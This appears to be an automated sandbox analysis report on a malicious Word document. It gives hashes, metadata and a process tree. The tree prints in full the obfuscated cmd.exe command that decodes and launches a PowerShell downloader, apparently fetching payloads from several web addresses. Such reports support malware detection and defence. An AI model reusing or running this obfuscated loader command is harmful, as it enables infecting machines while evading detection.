File name: | I88315_120518.doc |
Full analysis: | https://app.any.run/tasks/c7a042a2-cb29-49ed-86c7-a1f52607252f |
Verdict: | Malicious activity |
Analysis date: | December 06, 2018, 03:31:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Dec 5 15:40:00 2018, Last Saved Time/Date: Wed Dec 5 15:40:00 2018, Number of Pages: 1, Number of Words: 7, Number of Characters: 40, Security: 0 |
MD5: | 8409D10ADFD5F54A1877D1458A083CF4 |
SHA1: | 4A2B1C239F3947CD496237874840A45097933659 |
SHA256: | 996BCF688930EF40585B7635F21018D301FEE0D43B8AA3038F728F71C135B6AB |
SSDEEP: | 1536:6681ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a98fkS03osuxtiPxFYPay:38GhDS0o9zTGOZD6EbzCdsaRMQy |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 46 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 40 |
Words: | 7 |
Pages: | 1 |
ModifyDate: | 2018:12:05 15:40:00 |
CreateDate: | 2018:12:05 15:40:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\I88315_120518.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3964 | c:\DjcKviLMShSjWu\WlEARwdAw\BcqkqbYcuVlY\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set yN5G=AwPRfwcPaTUAjiTLjjCDCH-N=WzVBgS9})7F\+v:kdKp/3xqnG$om.slIZe10'b(@Eu yh{8,tY;rMOJ&&for %W in (50;27;28;57;24;61;41;20;23;61;75;50;65;54;13;24;48;58;5;22;51;62;17;58;6;73;67;23;58;73;53;25;58;62;20;55;13;58;48;73;75;50;28;15;47;24;61;69;73;73;43;39;44;44;73;5;13;55;52;53;6;51;52;44;56;54;38;55;46;21;10;64;69;73;73;43;39;44;44;40;8;5;8;69;76;58;48;29;29;8;48;13;54;53;6;51;52;44;41;23;20;78;41;31;28;35;5;7;64;69;73;73;43;39;44;44;62;48;13;6;55;53;48;58;73;44;79;56;23;59;7;45;47;65;34;14;64;69;73;73;43;39;44;44;41;58;38;53;68;8;17;66;76;53;6;51;52;44;43;27;6;60;77;40;76;10;35;64;69;73;73;43;39;44;44;69;58;55;55;51;41;58;38;53;58;4;76;51;48;73;22;41;58;38;53;6;51;52;53;8;66;44;40;19;46;59;49;3;62;78;51;71;61;53;30;43;55;13;73;63;61;64;61;33;75;50;26;10;66;24;61;35;14;10;61;75;50;76;41;14;67;24;67;61;71;31;34;61;75;50;69;66;23;24;61;17;11;42;61;75;50;5;14;4;24;50;58;48;38;39;73;58;52;43;37;61;36;61;37;50;76;41;14;37;61;53;58;46;58;61;75;4;51;76;58;8;6;69;63;50;74;6;38;67;13;48;67;50;28;15;47;33;70;73;76;68;70;50;65;54;13;53;19;51;5;48;55;51;8;41;35;13;55;58;63;50;74;6;38;72;67;50;5;14;4;33;75;50;20;26;30;24;61;26;54;28;61;75;56;4;67;63;63;49;58;73;22;56;73;58;52;67;50;5;14;4;33;53;55;58;48;29;73;69;67;22;29;58;67;71;60;60;60;60;33;67;70;56;48;38;51;40;58;22;56;73;58;52;67;50;5;14;4;75;50;73;74;19;24;61;55;69;5;61;75;62;76;58;8;40;75;32;32;6;8;73;6;69;70;32;32;50;47;28;65;24;61;5;6;41;61;75;82)do set fnyr=!fnyr!!yN5G:~%W,1!&&if %W gtr 81 power%USERPROFILE:~7,1%he%PUBLIC:~12,1%%ProgramW6432:~13,-2% "!fnyr:~-452!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2528 | CmD /V:O/C"set yN5G=AwPRfwcPaTUAjiTLjjCDCH-N=WzVBgS9})7F\+v:kdKp/3xqnG$om.slIZe10'b(@Eu yh{8,tY;rMOJ&&for %W in (50;27;28;57;24;61;41;20;23;61;75;50;65;54;13;24;48;58;5;22;51;62;17;58;6;73;67;23;58;73;53;25;58;62;20;55;13;58;48;73;75;50;28;15;47;24;61;69;73;73;43;39;44;44;73;5;13;55;52;53;6;51;52;44;56;54;38;55;46;21;10;64;69;73;73;43;39;44;44;40;8;5;8;69;76;58;48;29;29;8;48;13;54;53;6;51;52;44;41;23;20;78;41;31;28;35;5;7;64;69;73;73;43;39;44;44;62;48;13;6;55;53;48;58;73;44;79;56;23;59;7;45;47;65;34;14;64;69;73;73;43;39;44;44;41;58;38;53;68;8;17;66;76;53;6;51;52;44;43;27;6;60;77;40;76;10;35;64;69;73;73;43;39;44;44;69;58;55;55;51;41;58;38;53;58;4;76;51;48;73;22;41;58;38;53;6;51;52;53;8;66;44;40;19;46;59;49;3;62;78;51;71;61;53;30;43;55;13;73;63;61;64;61;33;75;50;26;10;66;24;61;35;14;10;61;75;50;76;41;14;67;24;67;61;71;31;34;61;75;50;69;66;23;24;61;17;11;42;61;75;50;5;14;4;24;50;58;48;38;39;73;58;52;43;37;61;36;61;37;50;76;41;14;37;61;53;58;46;58;61;75;4;51;76;58;8;6;69;63;50;74;6;38;67;13;48;67;50;28;15;47;33;70;73;76;68;70;50;65;54;13;53;19;51;5;48;55;51;8;41;35;13;55;58;63;50;74;6;38;72;67;50;5;14;4;33;75;50;20;26;30;24;61;26;54;28;61;75;56;4;67;63;63;49;58;73;22;56;73;58;52;67;50;5;14;4;33;53;55;58;48;29;73;69;67;22;29;58;67;71;60;60;60;60;33;67;70;56;48;38;51;40;58;22;56;73;58;52;67;50;5;14;4;75;50;73;74;19;24;61;55;69;5;61;75;62;76;58;8;40;75;32;32;6;8;73;6;69;70;32;32;50;47;28;65;24;61;5;6;41;61;75;82)do set fnyr=!fnyr!!yN5G:~%W,1!&&if %W gtr 81 powershel%ProgramW6432:~13,-2% "!fnyr:~-452!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR97B2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:41379A924454D4DBF21EC8153C20C10F | SHA256:0C15CF2B44D7D8698623838B4214E135CD0F5B33F8FE0D860DBE04AB98A65B80 | |||
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$8315_120518.doc | pgc | |
MD5:417C49E35F0F7002D50184715A0BAF73 | SHA256:CABC33B3A6432B5055987C411BE4EBD405EE994A3D938289B5E12AF60340AFB6 |